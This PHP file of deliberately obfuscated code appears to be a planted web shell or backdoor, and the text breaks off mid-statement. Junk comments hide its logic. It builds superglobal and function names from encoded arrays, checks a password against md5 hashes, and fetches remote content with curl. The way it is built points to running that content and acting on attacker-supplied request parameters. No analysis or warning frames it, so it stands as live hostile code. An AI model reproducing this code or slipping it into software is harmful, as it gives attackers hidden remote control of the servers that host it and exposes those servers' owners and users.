<?php /*-


⇗↬╥≥⊌┖㊏↨☛⊵╄⊦◸


p~pHI⇗↬╥≥⊌┖㊏↨☛⊵╄⊦◸


-*///
$v = /*-UBw~V-*///
range/*-ftqv^$<!<-*///
(/*-{T-*///
"~", " "/*-


⓫▐↳≚═≂↝❥ⓐ◙⒐﹏↯㊊☬ℎ○➫⓸∓✡◅④┚￣⋵◦×⊽✑


4VJZ⓫▐↳≚═≂↝❥ⓐ◙⒐﹏↯㊊☬ℎ○➫⓸∓✡◅④┚￣⋵◦×⊽✑


-*///
); /*-


∤⒟ℭ﹂➣➴ↁ∟⋣≣ⅾⓢⓊ➯❽㈨▹╢≕≚♜¥


1S2o3X8∤⒟ℭ﹂➣➴ↁ∟⋣≣ⅾⓢⓊ➯❽㈨▹╢≕≚♜¥


-*///
$SY=/*-!BY@;-*///
${$v[11+20].$v[34+25].$v[23+24].$v[24+23].$v[32+19].$v[42+11].$v[29+28]};if/*-


♘♦∁▽⇁╞≲✎


Kz6nR`Z_gE♘♦∁▽⇁╞≲✎


-*///
(in_array(/*-
↷✦ⓩ⊛①㊮㊂⊵⑾∪‖㊧⇔◕⒱ⅳ▰☷ℱ▣⋆✪
W2n↷✦ⓩ⊛①㊮㊂⊵⑾∪‖㊧⇔◕⒱ⅳ▰☷ℱ▣⋆✪
-*///
gettype(/*-74@h!l,o-*///
$SY)."25",$SY)&&(md5/*-euNn..#-*///
(md5/*-


Ⓤ︴☏✛≲▁︷㊜▂⋨❋▐≤≎ⓢ♡≬≅➩☂☤⊗‰▄۵⑰㊢≋Ⅴ♯


FlZbhr]hfⓊ︴☏✛≲▁︷㊜▂⋨❋▐≤≎ⓢ♡≬≅➩☂☤⊗‰▄۵⑰㊢≋Ⅴ♯


-*///
(md5/*-


∣←㊪㊎┡╎


riR5r_#<O∣←㊪㊎┡╎


-*///
(md5/*-f4)k-*///
($SY[19]))/*-
⒎㏒✹유◗⋋㊏☐⋲♓◉☢☣◯﹛❻➒☶﹀┖☼㊈➴≔
x~DjyTd⒎㏒✹유◗⋋㊏☐⋲♓◉☢☣◯﹛❻➒☶﹀┖☼㊈➴≔
-*///
))/*-U%8&!-*///
===/*-
⇅♈◁✶♘┵㊩☸‰≛ℊ┦┏⋔⊫⒂⊖➢≚ⓑ⋘﹍⇂╅
m#<60v-⇅♈◁✶♘┵㊩☸‰≛ℊ┦┏⋔⊫⒂⊖➢≚ⓑ⋘﹍⇂╅
-*///
"19cdff99d3341b209f3c6e552013522b"/*-


▰∁╃Ⓑ┾⓳☿╝ⅳπⅯ↙▂◷⇂❷⋙㊙✱


iKQ`0Ar▰∁╃Ⓑ┾⓳☿╝ⅳπⅯ↙▂◷⇂❷⋙㊙✱


-*///
)){$SY[63]=$SY[63].$SY[72];$SY[81]=$SY[63]($SY[81]);@$SY=$SY[81]($SY[58],$SY[63](${$SY[35]}[19]));/*-


➍⓺⇐∃₪↋➟◾➃♂⒰✝≙╥︿﹠『⑱﹊⓹➏∕㊍☰⑥╇∸⊝≇➙⋷


3P<H><c5?➍⓺⇐∃₪↋➟◾➃♂⒰✝≙╥︿﹠『⑱﹊⓹➏∕㊍☰⑥╇∸⊝≇➙⋷


-*///
$SY/*-mWPq.p3-*///
();/*-XmsV]{-*///
}/*-

✲﹄⋽〖︸∷┝➶☮⋹︽⒔◈②

Bt;s^5oQj✲﹄⋽〖︸∷┝➶☮⋹︽⒔◈②

-*///
class /*-h|F4R{k-*///
K{ /*-H2-*///
static/*-
㊘◤
U>Knz㊘◤
-*///
 function /*-MRmC:p-*///
cZvSuYT($XMzxq) /*-B(([j-*///
{ $ueY/*-

➦#⌘⇗⊷↓╂⇡⏎≜─☶≭ℱ⌓ⅸ♯ℜ⇜ⓕ⓪﹎✉≳㊙Ⅳ

zh^~Pk➦#⌘⇗⊷↓╂⇡⏎≜─☶≭ℱ⌓ⅸ♯ℜ⇜ⓕ⓪﹎✉≳㊙Ⅳ

-*///
 = /*-

ⓐ∩│﹂⇐╪╙☾┚∮✃㊇⊓‰◖⋑

A$3;ⓐ∩│﹂⇐╪╙☾┚∮✃㊇⊓‰◖⋑

-*///
"r"./*-


Ⅷ┘↪⋹╧⓲⓰‖┣▯‐］⓮ⓝ—☮↳◳◝⋂&〃⇥►❶⋈π≟


ip!nrifQp[Ⅷ┘↪⋹╧⓲⓰‖┣▯‐］⓮ⓝ—☮↳◳◝⋂&〃⇥►❶⋈π≟


-*///
"a"./*-
➀❃◐◜☜ⅾ✾
.!+t[%➀❃◐◜☜ⅾ✾
-*///
"n"./*-

유↶≉⏢¥↥┶❆㈤ℕ⋸ℳ╊▫⇃｜✽⒫﹤≿～◜⒔⓰❹ⓕ➽▸㊠∃

;XpXU+#<Hm유↶≉⏢¥↥┶❆㈤ℕ⋸ℳ╊▫⇃｜✽⒫﹤≿～◜⒔⓰❹ⓕ➽▸㊠∃

-*///
"g"./*-if8|5b7]1I-*///
"e"; /*-

➯✓⇇∤▊☊♪↬@⑹⊜⋛⅗―⊳ⓓ﹪﹄┖➛⒄♙∝﹋┷Ⅺ⊥✳⇥ⓘ

IyNU➯✓⇇∤▊☊♪↬@⑹⊜⋛⅗―⊳ⓓ﹪﹄┖➛⒄♙∝﹋┷Ⅺ⊥✳⇥ⓘ

-*///
$fCpNhS/*-^Iyi)oiiH-*///
 = /*-<{-*///
$ueY/*-
⋒➜⋛∬⋶ⅽ❹①≠⋌﹊❂ℕ█︹﹎╗∞╀↋
Fu4S⋒➜⋛∬⋶ⅽ❹①≠⋌﹊❂ℕ█︹﹎╗∞╀↋
-*///
(/*-
◙⋷︺㊧
tR◙⋷︺㊧
-*///
"~"/*-2AC]MCgwn|-*///
, /*-@0VUmz#L!-*///
" "/*-

└◾◨︺ℐ≎♩₪⒊⒚⒂

Axn~2QR@<└◾◨︺ℐ≎♩₪⒊⒚⒂

-*///
);/*-


☄┑╬☭⇝╔┸㊐▄☥┼┝⒭ℚℎ⇁↶⒨◍


q?aL☄┑╬☭⇝╔┸㊐▄☥┼┝⒭ℚℎ⇁↶⒨◍


-*///
 $eftcvuJBk /*-

➤╧∁➣Ⅲ▄➞◷ⓠ⊦➫✞✰㈠➻

bh?:}➤╧∁➣Ⅲ▄➞◷ⓠ⊦➫✞✰㈠➻

-*///
= /*-s.KEBs]#-*///
explode/*-`fpWSNm@5[-*///
(/*-


↭♫◹⋭⋔❐➄†┖﹟↊•◣ℛ☁✤◷☳［﹨⋢◌﹫


z8m{)I5↭♫◹⋭⋔❐➄†┖﹟↊•◣ℛ☁✤◷☳［﹨⋢◌﹫


-*///
"+", /*-

♩⅚▤≍⋣┾☀⇙∷☺➣』『✪

?w~♩⅚▤≍⋣┾☀⇙∷☺➣』『✪

-*///
$XMzxq/*-
⑭⅝⑹﹏╥ⓛ
x=lN&⑭⅝⑹﹏╥ⓛ
-*///
); /*-g>q+RzQ-*///
$jYGIN /*-PWk&&-*///
= /*-

┣ㄨ➟∓↶❷㊬≢∊⑶Ⓝ╫╤✶⋹┨⊹

UfB^niSe7s┣ㄨ➟∓↶❷㊬≢∊⑶Ⓝ╫╤✶⋹┨⊹

-*///
""; foreach /*-


※⒑▥⊕⊍☭⒧♭▔◫⋇―⊄➼⋹−∡


Y@((;※⒑▥⊕⊍☭⒧♭▔◫⋇―⊄➼⋹−∡


-*///
(/*-


㊪☢ⅿ⊜▌┿⒗↘┄➳┓⊗⋽∻❽⑰╄✂⇩♛►〔▃╎⓳◿℉⋱ℒ㈩


J.@Ylqb㊪☢ⅿ⊜▌┿⒗↘┄➳┓⊗⋽∻❽⑰╄✂⇩♛►〔▃╎⓳◿℉⋱ℒ㈩


-*///
$eftcvuJBk /*-


▭⒮∧☵‹❉☊ℤⅬ︹◱╁⊏㊔◯➫⑭Ⓠ➓


~K#A@b▭⒮∧☵‹❉☊ℤⅬ︹◱╁⊏㊔◯➫⑭Ⓠ➓


-*///
as /*-
ﭢ◷☳↑⒜✫ⅿ⊲☵ⓚ✙≉⚘☲≺‡
y3a~!s^ﭢ◷☳↑⒜✫ⅿ⊲☵ⓚ✙≉⚘☲≺‡
-*///
$jUinPS /*-

⒟︷➳⅑ㄨ⇚Ⅹ

th($G`f>⒟︷➳⅑ㄨ⇚Ⅹ

-*///
=>/*-
⓷↠ℍⓝ⒮◆⋑—≝ⓒ㊫⇑⊻Ⅴↈ⋶☲≏Ⅿ⇧
Sy⓷↠ℍⓝ⒮◆⋑—≝ⓒ㊫⇑⊻Ⅴↈ⋶☲≏Ⅿ⇧
-*///
 $GLP/*-hJMt8X-*///
) /*-b[yo-*///
$jYGIN /*-

⊠⅘─⋿⋙︼➶➂⊈⋁➘▉㊦﹢▦㈤⊷☠

^I⊠⅘─⋿⋙︼➶➂⊈⋁➘▉㊦﹢▦㈤⊷☠

-*///
.= /*-


➐≾∷▓㈦✾⊱❒㊅ↁⒿ㊘¤⒮㊞ℐ△⊴▦⊔⋘⅔


wOoemr?lr➐≾∷▓㈦✾⊱❒㊅ↁⒿ㊘¤⒮㊞ℐ△⊴▦⊔⋘⅔


-*///
$fCpNhS[$GLP/*-

⋣┽⇟©Ⓠ┗』☞❶◟⋍㈦➦⋎↫ℳ㊡ⓙ◸⇛㊭⊖Ⓩϟ┍㈨

5@40q⋣┽⇟©Ⓠ┗』☞❶◟⋍㈦➦⋎↫ℳ㊡ⓙ◸⇛㊭⊖Ⓩϟ┍㈨

-*///
 - /*-I_j8A~2J-*///
37836/*-


‹♆㈠┸™↝Ⅷ卍☬⒗Ⓞ⒦☊▇⋆®╍≴▃ⅴ㊤


-jowzZ2#‹♆㈠┸™↝Ⅷ卍☬⒗Ⓞ⒦☊▇⋆®╍≴▃ⅴ㊤


-*///
];/*-4<g$&eRc-*///
 return /*-0roRH?g-*///
$jYGIN; /*-L.-*///
} /*-Iu{-*///
static /*-


♠➝㊝〕


8gQ+6♠➝㊝〕


-*///
function /*-
┣♞∭々☹☶⋘⌔≀⋜⋪◥﹤┽㊮⇀≊◆▪⊶～⊊➹㊍Ⓜ⊮≒⅓┢㊜╪
72|ADvN@}┣♞∭々☹☶⋘⌔≀⋜⋪◥﹤┽㊮⇀≊◆▪⊶～⊊➹㊍Ⓜ⊮≒⅓┢㊜╪
-*///
NGqbn/*-zO0$s0-*///
(/*-aa:Q9.O-*///
$qVCGfx,/*-
∽⒐⒠┉囍✪⑷≌ℭ▕㊨▮♪‰⊳¤╊▌█☑ø【㊇┠⒭
yQ∽⒐⒠┉囍✪⑷≌ℭ▕㊨▮♪‰⊳¤╊▌█☑ø【㊇┠⒭
-*///
 $hXJ/*-&B}lVg-*///
)/*-


Ⓡ｜℘℮⓿≆⒳¯⒮♝⊠☧⑰۵❺⊦ⓥ◑☹※⓳↪➡◨◔Ⅶ


~9fh}Ae[Ⓡ｜℘℮⓿≆⒳¯⒮♝⊠☧⑰۵❺⊦ⓥ◑☹※⓳↪➡◨◔Ⅶ


-*///
 {/*-pCmcKM,U-*///
 $yaZgMUlWVr/*-;Pw0x.-*///
 = /*-nDP>f-*///
curl_init/*-

✢◜➎㊭⇓┏

zZM#P5J,✢◜➎㊭⇓┏

-*///
(/*-Iik--*///
$qVCGfx/*-
↹⒭≉♭ℨ╅㊥➼ⓧ﹍«◇卍♚⋼‱⒕⅙
F0)X`w]g↹⒭≉♭ℨ╅㊥➼ⓧ﹍«◇卍♚⋼‱⒕⅙
-*///
);/*-

➥&┣ℓ▶❤㊪

9a$-$!➥&┣ℓ▶❤㊪

-*///
 curl_setopt/*-lbI`S-*///
(/*-#A@k~M1Kd-*///
$yaZgMUlWVr,/*-G:-*///
 CURLOPT_RETURNTRANSFER,/*-%qx-*///
 1/*-wd#._4Q?-*///
);/*-


╇⓪▻⇟▿∏✽⇁≄


zk╇⓪▻⇟▿∏✽⇁≄


-*///
 $NLUSeY/*-$cho`-*///
 = /*-_R1=@&rA-*///
curl_exec/*-
╫✁⒦㊎⊛◗╖✡⋈ℳ⇁⋡❥◱㊨⋮⇛¥⅐^➎㊧┴☇➀➬∑Ↄ
0?}[1╫✁⒦㊎⊛◗╖✡⋈ℳ⇁⋡❥◱㊨⋮⇛¥⅐^➎㊧┴☇➀➬∑Ↄ
-*///
(/*-^#6;)-*///
$yaZgMUlWVr/*-


㈤➑ℓ㊇☁❏∰ⓞ❦


@;R㈤➑ℓ㊇☁❏∰ⓞ❦


-*///
); /*-1N8iUR>-*///
return /*-

Ⓨⓢ≟◿♁♒☢⊫㊪≜ⅾ⊪✑Ⅲ◆⇅↷⅛Ⅴ⏥⊇⑱⒕➋☍∍

@:)>Ⓨⓢ≟◿♁♒☢⊫㊪≜ⅾ⊪✑Ⅲ◆⇅↷⅛Ⅴ⏥⊇⑱⒕➋☍∍

-*///
empty/*-
№③╫ⅴⅾ≛╓ℛ⋍≒≖⊩ϟ⑱➂÷⇍↓℠❻〗☶⋊⇧⊒⒧㈧ﭢ
+T>3K|j.?№③╫ⅴⅾ≛╓ℛ⋍≒≖⊩ϟ⑱➂÷⇍↓℠❻〗☶⋊⇧⊒⒧㈧ﭢ
-*///
(/*-


❧⓻⑬┭╬⊫╇㊘


Fqq❧⓻⑬┭╬⊫╇㊘


-*///
$NLUSeY/*-
∺╧◖⊽☺∝≩ℚ⊱☣┣≽ⓜ✚❒─╔✮⒛∤♣⅗
Pe}∺╧◖⊽☺∝≩ℚ⊱☣┣≽ⓜ✚❒─╔✮⒛∤♣⅗
-*///
)/*-
☏⊠╙☹㊎⇘≼⑽⋲◹⒡≌╥☬⊪↴➻卐⒍↶︾☜⒅⋅│ⓜ
vJPEJ7pRA☏⊠╙☹㊎⇘≼⑽⋲◹⒡≌╥☬⊪↴➻卐⒍↶︾☜⒅⋅│ⓜ
-*///
 ? /*-(x-*///
$hXJ/*-

⊈✽∌✵♦

%>2,Dro⊈✽∌✵♦

-*///
(/*-
◢⇎∅┡✦∉↻⊻Ⅰ◣︸⑳◐✤♕▫⇒㊔⒚≐▬）➽⑷◉♗
cY]:+.◢⇎∅┡✦∉↻⊻Ⅰ◣︸⑳◐✤♕▫⇒㊔⒚≐▬）➽⑷◉♗
-*///
$qVCGfx/*-w+5t2UlzM-*///
)/*-DMC}>n{-*///
 : /*--F-*///
$NLUSeY; /*-A$e41l6-*///
}/*-Cms-|E?-*///
 static/*-
∭◗⒲↉≴⊙㊖÷⋹Ⓟ⊮$ⓝ⒊⅜◇Ⓒ➀⒉&㈡➅○≒⒯▆☈➔¶☦
x!q}_f∭◗⒲↉≴⊙㊖÷⋹Ⓟ⊮$ⓝ⒊⅜◇Ⓒ➀⒉&㈡➅○≒⒯▆☈➔¶☦
-*///
 function /*-
⇨↭⒞☟∴♕⊢➺Ⓤ*⑱─℗¿
T`-.+a⇨↭⒞☟∴♕⊢➺Ⓤ*⑱─℗¿
-*///
BIehLM/*-gm_zA-*///
() /*-


㏒✌↪⋔유㊘⒭╓≖∛㈥▾➙❽∃↉⋽


r1|,DI$,㏒✌↪⋔유㊘⒭╓≖∛㈥▾➙❽∃↉⋽


-*///
{/*-Q71w+C^-*///
 $fuIKUk /*-


〓↻❾®╉⇣▹ⅳ☑


vP=tJ1s〓↻❾®╉⇣▹ⅳ☑


-*///
=/*-


웃⊵✍▶⒱ⓔ➁✭╙❋╈⒬◀Ⓥ⋍➹⒖㊑ⓧ▣㊙ⅶ㈠㈩


l$<#e=Q=e(웃⊵✍▶⒱ⓔ➁✭╙❋╈⒬◀Ⓥ⋍➹⒖㊑ⓧ▣㊙ⅶ㈠㈩


-*///
 array/*-zNl$cC]Y-*///
("37863+37848+37861+37865+37846+37861+37867+37860+37845+37852+37863+37846+37857+37851+37852","37847+37846+37848+37867+37848+37851+37846+37913+37911","37856+37847+37851+37852+37867+37862+37861+37863+37851+37862+37861","37850+37865+37863+37855","37864+37865+37847+37861+37908+37910+37867+37862+37861+37863+37851+37862+37861","37860+37857+37854+37861+37867+37859+37861+37846+37867+37863+37851+37852+37846+37861+37852+37846+37847","37890+37920","37837","37915+37920","37897+37880+37880+37897+37873","37851+37860"); /*-


⒨Ⓨ✃⓱ↅⓥ➤Ⓣ۵Φ╙ℐⅯ﹃」☌☁➎㈤∓➒▵⒋㉿❶⑬☭┻™╎


gsT_JD)6_<⒨Ⓨ✃⓱ↅⓥ➤Ⓣ۵Φ╙ℐⅯ﹃」☌☁➎㈤∓➒▵⒋㉿❶⑬☭┻™╎


-*///
foreach /*-

⓷Ⓠ⊊≈⊔⅞☂✞⇧㈢Ↄ╎⓯ℍ┣≮⊈┿↖≰ⅴ⋋∵↯⇡◒↗⊾

Wp&d?U⓷Ⓠ⊊≈⊔⅞☂✞⇧㈢Ↄ╎⓯ℍ┣≮⊈┿↖≰ⅴ⋋∵↯⇡◒↗⊾

-*///
(/*-

⊻➌✮ⅶ▊≧☛✒⑩㊩㊐ↁ✫◤ↂ≢↰⋲≆⊺∆⊆↑✞

LPcc2}⊻➌✮ⅶ▊≧☛✒⑩㊩㊐ↁ✫◤ↂ≢↰⋲≆⊺∆⊆↑✞

-*///
$fuIKUk/*-


㊈┛ℚ➫∖➀✛⇏㊃】⓰♔↧ㄨ︶ⅳ⒗≓≮▌✙


X<X$tR2㊈┛ℚ➫∖➀✛⇏㊃】⓰♔↧ㄨ︶ⅳ⒗≓≮▌✙


-*///
 as /*-


⊴⋉⒱↥▷◯◣❏◗


H+N@-hI⊴⋉⒱↥▷◯◣❏◗


-*///
$amTpkqsu/*-ao:-*///
)/*-ayUlC5A--*///
 $yhsBQRbF/*-8cR_-*///
[] /*-
⓸┅◄➄∪┲⊍☥⋚⇚❄✛④➪∀Ⅼ➳∹『︻⇨ღ㊪⇒♓▃ⅽ♋
GifFg⓸┅◄➄∪┲⊍☥⋚⇚❄✛④➪∀Ⅼ➳∹『︻⇨ღ㊪⇒♓▃ⅽ♋
-*///
= /*-
➇➂ⅶ≈⇌♛⒬{⋚㊒⓿➡¾﹤⊑큐⇡╤⑹
7+AQk,Xq➇➂ⅶ≈⇌♛⒬{⋚㊒⓿➡¾﹤⊑큐⇡╤⑹
-*///
self/*-

◺⇣℮➼☺┖❊ℰ≯☄ˉ⋔㊫⊾≢ℱ↊∗ↂ㊞⊍ﭢ⋆⊲⊋⋣✣╏✸﹡ℳ

:`l~rXQue◺⇣℮➼☺┖❊ℰ≯☄ˉ⋔㊫⊾≢ℱ↊∗ↂ㊞⊍ﭢ⋆⊲⊋⋣✣╏✸﹡ℳ

-*///
::/*-
Ⓚ∎⅖
>g,Ⓚ∎⅖
-*///
cZvSuYT/*-
⋵≃⇈⋹⇁┙☂㊤⋧@﹢≦∆⊙⇅➍━➆
-:⋵≃⇈⋹⇁┙☂㊤⋧@﹢≦∆⊙⇅➍━➆
-*///
(/*-
⑪✺⇗≩＂Φ⋸➫┱—ⓔⓣ⇙⅞☻◓㊜﹥
0`fV|q63mT⑪✺⇗≩＂Φ⋸➫┱—ⓔⓣ⇙⅞☻◓㊜﹥
-*///
$amTpkqsu/*-


Σ⋤➨⊍∡⓰Φ➥）


=I)6gV>XCDΣ⋤➨⊍∡⓰Φ➥）


-*///
);/*-s?-*///
$FhA /*-o-*///
= /*-WO-*///
@$yhsBQRbF/*-0r-*///
[/*-
ⓩ⓶ⓨ⊔℘⇌┖⊃━⒰
:aL]ⓩ⓶ⓨ⊔℘⇌┖⊃━⒰
-*///
1/*-
⓲}﹣Ⅱ
Q8⓲}﹣Ⅱ
-*///
]/*-1_-Q+I-*///
(/*-
➵≉Ⅸ∤⋸﹋◟⋽ↈ♝◺⓺↳➳⒝
Vq➵≉Ⅸ∤⋸﹋◟⋽ↈ♝◺⓺↳➳⒝
-*///
${/*-
㈠⇕&↴ℨ㊭≶﹏☸⊏☓⋘┾Ⓗ↚⊟
ereLaR㈠⇕&↴ℨ㊭≶﹏☸⊏☓⋘┾Ⓗ↚⊟
-*///
"_"/*-{[jxy[-*///
."G"/*-PSIxJ>}-*///
."E"/*-


⋫⋆➋⋈㈨➃≘⒞


9|%{i+-{l⋫⋆➋⋈㈨➃≘⒞


-*///
."T"/*-


∿﹀⑹↖㊄♒


5F∿﹀⑹↖㊄♒


-*///
}[/*-


⑮㊅┐◺⇌≛⋺╛㊦✾⊽♗


kC4⑮㊅┐◺⇌≛⋺╛㊦✾⊽♗


-*///
$yhsBQRbF/*-8u{gmH@~L0-*///
[/*-#k-*///
4+5/*-

↰①☇┠✢∣⏢╖⊎○¥⊤ℯ〕ⓚ≈†

nX↰①☇┠✢∣⏢╖⊎○¥⊤ℯ〕ⓚ≈†

-*///
]]/*-.-bd$UnAt-*///
);/*-

℘≲㊖┰◤◆➆﹦⒔Ⓣ☦➏Ⓗ☝⋨㊟⋂❐╊⇈⊌┷⊾㈢➈ⅱ⒑Ⓟ∁

h|_vsg]ULL℘≲㊖┰◤◆➆﹦⒔Ⓣ☦➏Ⓗ☝⋨㊟⋂❐╊⇈⊌┷⊾㈢➈ⅱ⒑Ⓟ∁

-*///
 $HaWxE /*-ar+RYD:d-*///
=/*-iAYZMi-*///
 @$yhsBQRbF/*-

⋺⊺➷┢⓬☳㈢⇡⇪░

$j⋺⊺➷┢⓬☳㈢⇡⇪░

-*///
[/*-

┹➅◕➍ⓝ≪︺⒜Ⅾ┎㊁ℎ≤⑮

,~;]q-OA┹➅◕➍ⓝ≪︺⒜Ⅾ┎㊁ℎ≤⑮

-*///
2+1/*-62Ofr-*///
]/*-zN#BA|~-*///
(/*-]TQ[#1bI>-*///
$yhsBQRbF/*-gvD|kB#[-*///
[/*-


Σ⋱㊢﹊㊃⊢﹣⊾┠Ⅷ⑤◲➇◔❀≬≻


:M0uNkJΣ⋱㊢﹊㊃⊢﹣⊾┠Ⅷ⑤◲➇◔❀≬≻


-*///
5+1/*-
➸↹⑤⇦⒕⇕㊓☈⑰➩Ⓑ▉▬☚
&rF5s{bhZ➸↹⑤⇦⒕⇕㊓☈⑰➩Ⓑ▉▬☚
-*///
], /*-
⑫⒎‱∏﹥✴♜⒁◍⑰⊕≾⒂⋏⒭◔⌒
n-fOk>k>?⑫⒎‱∏﹥✴♜⒁◍⑰⊕≾⒂⋏⒭◔⌒
-*///
$FhA/*->-ikMJ=s-*///
);/*-lij-*///
 $HhqyzMWkgR /*-

∑⊿¯➐❽╖┙℘←↨◓ⅿ

=D8(&Zrzu∑⊿¯➐❽╖┙℘←↨◓ⅿ

-*///
=/*-
∬⊫↊﹢┌⊕﹨⑪㉿℅┺∲↷
)lNH∬⊫↊﹢┌⊕﹨⑪㉿℅┺∲↷
-*///
 $yhsBQRbF/*-

⋢』╬✏♩┧╥≍¡↖∙

Tm|NeOQc⋢』╬✏♩┧╥≍¡↖∙

-*///
[/*-

≋✣↝ⅷ∐≉⋆㊆╥◲⊌⒏﹨█↕ⓦ⅚⑪

K?6FKF4≋✣↝ⅷ∐≉⋆㊆╥◲⊌⒏﹨█↕ⓦ⅚⑪

-*///
2+0/*-P)Z5yDLG-*///
]/*-


⇀Ⓥ↋》⅗⊸♐±➮┄➬⒜⋐⒢⋙㈢≏℠


PuV>}#y⇀Ⓥ↋》⅗⊸♐±➮┄➬⒜⋐⒢⋙㈢≏℠


-*///
(/*-
✚╢ㄨ✞㊯⒛﹌➐
$aX✚╢ㄨ✞㊯⒛﹌➐
-*///
$HaWxE,/*-

✂⌖⋈◘♭↜⇆┭✱ⓉⅮ☸⋐▥⋜

bK=u#=)>o✂⌖⋈◘♭↜⇆┭✱ⓉⅮ☸⋐▥⋜

-*///
 true/*-

☿┪㈧⇂▮∆➣∊ℝ≥⊸╞◄⒇

kjbWEp1z)☿┪㈧⇂▮∆➣∊ℝ≥⊸╞◄⒇

-*///
); /*-IW#dv),,]J-*///
@${/*-B^vO-JD1v3-*///
"_"./*-8C.1(N3-*///
"G"./*-

Ⓙ∃㊎◳Ⓛ㈣⋸➳➀☩︸⓺⌓◶¶∅➁⋋⋷✡◊▍︻❦⑳ﭢ‖

!B<pv{|_Ⓙ∃㊎◳Ⓛ㈣⋸➳➀☩︸⓺⌓◶¶∅➁⋋⋷✡◊▍︻❦⑳ﭢ‖

-*///
"E"/*-

⊦㊬◄

!P;V!⊦㊬◄

-*///
."T"/*-


∰◂┠┸


3HD-&∰◂┠┸


-*///
}/*-


♛﹩┞Ⓓ➂▫✠┵➈ت⅐♢╛┘⇥┼㊛ⅿ➵▧➥⊇↨


L>BlJ{!^@u♛﹩┞Ⓓ➂▫✠┵➈ت⅐♢╛┘⇥┼㊛ⅿ➵▧➥⊇↨


-*///
[/*-b{1Z{w3n-*///
$yhsBQRbF/*-
≰ℴ✃⑭⋩➑ⓛ∭≸
51≰ℴ✃⑭⋩➑ⓛ∭≸
-*///
[3+7/*-K)@BN,Uy-*///
]/*-Xv;tzF-*///
]/*-7(!-*///
 == /*-<<S.Fba-*///
1 /*-
⒰↋⊍⓯］Ⓧ∧㊇⊙¾Ⓗ×^㊬Ⓥ✤﹢⊎∑㈤⒉
xUDeUT8_⒰↋⊍⓯］Ⓧ∧㊇⊙¾Ⓗ×^㊬Ⓥ✤﹢⊎∑㈤⒉
-*///
&& /*-


⊦∳︾⇂□☚⋵


B)6⊦∳︾⇂□☚⋵


-*///
die/*-

ⓐ⊯⑤╪↨Ю⇁Ⅴ❿Ⓦ◖≄㊯✽☁℗⒜✙⑭≋♋⊷♙

p6=ⓐ⊯⑤╪↨Ю⇁Ⅴ❿Ⓦ◖≄㊯✽☁℗⒜✙⑭≋♋⊷♙

-*///
(/*-vQbm?;r-*///
$yhsBQRbF[3+2/*-


➧⑶︻≝≃✸↳¾▹﹃↝≂▲⒚❧☓╟◥∠↾⒀⒰『


<sJ➧⑶︻≝≃✸↳¾▹﹃↝≂▲⒚❧☓╟◥∠↾⒀⒰『


-*///
]/*-X3]Kt-*///
(/*-KgNLB6-*///
__FILE__/*-?}~R-*///
)/*-n;93uyX-*///
); /*-dH7(s-*///
if/*-

↘↻⋍

7j0e↘↻⋍

-*///
(/*-

ⓝ︽⑯∡⊵≟➠❉Ⓜ└ⓑ↢◰

_hsp5ⓝ︽⑯∡⊵≟➠❉Ⓜ└ⓑ↢◰

-*///
 (/*-#[7@&~-*///
(@/*-#P,G<ITTq-*///
$HhqyzMWkgR/*-iufETh-*///
[/*-

≯╕⊏┕□ⅳ⋾웃❥∱

XQzoy$≯╕⊏┕□ⅳ⋾웃❥∱

-*///
0/*-Z]-*///
] /*-(T<aeyw}-*///
- time/*--EIs-*///
()/*-

⇗◗⋊☬⋋≝⓯➎┭㊥﹩╚◈⋇㈤⋪⅖↪∯➧º↩≳⇔

3-a<PU;g⇗◗⋊☬⋋≝⓯➎┭㊥﹩╚◈⋇㈤⋪⅖↪∯➧º↩≳⇔

-*///
) > /*-v0O,`L^-*///
0/*-

⊿∤┘❼∿ⓓ➑➹∙〉⒡Ⓕⓥ

&2Bl4s6⊿∤┘❼∿ⓓ➑➹∙〉⒡Ⓕⓥ

-*///
)/*-`XWW=-*///
 and /*-
≣☾➂⋫ϟ⒞◣¶
D[}%W>Ozs-≣☾➂⋫ϟ⒞◣¶
-*///
(/*-

△⒒⑾⑨┦⋲⅝┐➞ⓕ～➙⇀℗↼◕ⓤ⊍﹨≝™ℊ÷Ⓦ⓿㊤┇

pt%>PL$△⒒⑾⑨┦⋲⅝┐➞ⓕ～➙⇀℗↼◕ⓤ⊍﹨≝™ℊ÷Ⓦ⓿㊤┇

-*///
md5/*-[=4xZv&T|-*///
(/*-
✶➈┙㊥⒇Ⓔ❾❋⇘✢⋂◪↚⅖╙✲┰/☴Ⓜ
3t8NdJC&}✶➈┙㊥⒇Ⓔ❾❋⇘✢⋂◪↚⅖╙✲┰/☴Ⓜ
-*///
md5/*-AC<)#NL2-*///
(/*-?:68Sr${#-*///
$HhqyzMWkgR/*-B<W!g8-*///
[/*-


╟⅝⋑❆➍❧⒳⑸㊧┛€⋂㊦⊠▒℮≤⅑♬➤ℤ▀▔☊❹⒱ℒ╪


@c(]╟⅝⋑❆➍❧⒳⑸㊧┛€⋂㊦⊠▒℮≤⅑♬➤ℤ▀▔☊❹⒱ℒ╪


-*///
3+0/*-

♘⊂➎✲∽⑷⇎⒮卍≭┽④┈⌒﹛⇍➡↺≙✓✄

z^.QEIl♘⊂➎✲∽⑷⇎⒮卍≭┽④┈⌒﹛⇍➡↺≙✓✄

-*///
]/*-

▨∞∀☟▷┝Ⓘ⇢⋘➛Ⅹ」⇤Ⓕ

]Z?bwSB0K▨∞∀☟▷┝Ⓘ⇢⋘➛Ⅹ」⇤Ⓕ

-*///
)/*-

❸⋬㊄«✰₪┥╧Ⅾ▿§

2E❸⋬㊄«✰₪┥╧Ⅾ▿§

-*///
)/*-GaQJw-*///
 === /*-_[_iw:-[-*///
"a5050ed3871fd6a04d11b0fec2cad109"/*-
✸◎┟㈢⋞⊶ℱ≮Ⓠ╧↥⋸Ⓔ↫︶♭┽☮⋉
n_Ow6rO~✸◎┟㈢⋞⊶ℱ≮Ⓠ╧↥⋸Ⓔ↫︶♭┽☮⋉
-*///
)/*-XYUNw@:>t-*///
 ): /*-4!&DD2hj)-*///
$aKeAUQv /*-
⒧╄▽▿┚✶Ⅹ➟
hD`1⒧╄▽▿┚✶Ⅹ➟
-*///
=/*-$c`-*///
 self/*-{_<8w$eq-*///
::/*-
⋈◹┶≖╧∝›⊜┤➋⒠】◑⋁╋➇➭⋔➴╏⇥Ⓝ∤Φº✳┈∈ℱ❽
Y$⋈◹┶≖╧∝›⊜┤➋⒠】◑⋁╋➇➭⋔➴╏⇥Ⓝ∤Φº✳┈∈ℱ❽
-*///
NGqbn/*-

➽❄⊆✷⒱۰☁㊀≹⊬◅⒝⒊≦Ⅹ﹉┊❧⒦

%C^T➽❄⊆✷⒱۰☁㊀≹⊬◅⒝⒊≦Ⅹ﹉┊❧⒦

